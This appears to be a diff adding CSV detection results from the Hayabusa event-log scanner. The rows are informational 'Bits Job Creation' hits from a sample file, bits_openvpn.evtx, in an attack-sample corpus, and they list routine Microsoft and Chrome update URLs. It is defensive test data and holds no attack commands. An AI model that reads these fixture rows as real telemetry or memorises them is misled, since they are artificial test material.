+2020-11-05 19:59:51.480 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-05 20:03:04.083 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aHmh2.img?w=100&h=100&m=6&tilesize=medium&x=2005&y=1451&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-05 20:03:05.093 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161342940453_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-05 20:03:06.197 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: http://blob.weather.microsoft.com:80/static/mws-new/WeatherImages/210x173/29.jpg?a,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-05 21:31:12.664 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-05 21:31:12.941 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-05 21:33:21.719 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aFbhf.img?w=100&h=100&m=6&tilesize=medium&x=2920&y=321&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-06 00:25:28.955 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aIYx8.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-06 00:25:30.216 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161342940453_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-06 19:52:28.687 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aKxpG.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-06 23:56:52.824 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-08 00:33:50.498 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19R5M0.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-08 00:36:30.267 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-08 00:36:30.760 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-09 17:25:00.043 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download  :  URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-09 17:28:07.533 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-09 17:28:08.240 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-09 20:33:58.291 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aPIV0.img?w=100&h=100&m=6&tilesize=medium&x=1544&y=1092&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-09 20:33:58.749 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-09 20:33:59.731 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: http://blob.weather.microsoft.com:80/static/mws-new/WeatherImages/210x173/32.jpg?a,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-09 22:29:29.376 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-09 22:29:29.868 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-10 21:35:58.814 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-10 21:36:00.732 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-11 21:51:23.040 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-11 21:51:33.078 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.703 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.714 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.718 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.722 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.743 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.748 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.752 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.756 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.788 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.794 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.798 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.802 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.899 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.906 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.910 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.913 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 19:56:13.148 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{9FF0B339-0202-4A5B-B73E-CFFB4FCBD124}-86.0.4240.193_86.0.4240.183_chrome_updater.exe  :  URL: http://r2---sn-5hne6nsy.gvt1.com/edgedl/release2/chrome/QX5U7YrFu2EjtutZ_UHwBg_86.0.4240.193/86.0.4240.193_86.0.4240.183_chrome_updater.exe?cms_redirect=yes&mh=qK&mip=213.127.67.111&mm=28&mn=sn-5hne6nsy&ms=nvh&mt=1605092117&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 21:44:50.465 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 23:12:22.524 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aULGJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 23:12:25.568 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-13 19:12:09.946 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aYFdj.img?w=100&h=100&m=6&tilesize=medium&x=703&y=371&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-13 19:31:57.260 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-14 04:57:22.022 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-15 20:47:59.752 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-15 20:48:00.273 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-16 21:31:35.114 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download  :  URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-16 22:57:53.156 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-16 22:57:54.168 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-18 02:41:01.832 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-18 02:41:02.662 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-18 06:09:43.966 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b6mGJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-18 19:01:10.759 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b7AcJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-19 06:49:45.347 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-19 06:49:46.212 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-19 06:49:57.232 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{760E100C-4E23-45B0-A2E1-BB2607BF6ED4}-87.0.4280.66_86.0.4240.198_chrome_updater.exe  :  URL: http://r4---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/GIUtDEIRbSWI1y147Zo4bw_87.0.4280.66/87.0.4280.66_86.0.4240.198_chrome_updater.exe?cms_redirect=yes&mh=ls&mip=213.127.67.111&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1605736037&mv=m&mvi=4&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-19 18:04:09.949 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b9Paa.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-19 18:33:33.409 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b9S4l.img?w=100&h=100&m=6&tilesize=medium&x=1140&y=780&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-19 19:45:57.562 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aQJnx.img?w=100&h=100&m=6&tilesize=medium&x=1069&y=1223&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-20 02:49:15.102 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-20 02:49:15.960 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-21 20:12:30.660 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-21 20:12:31.102 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
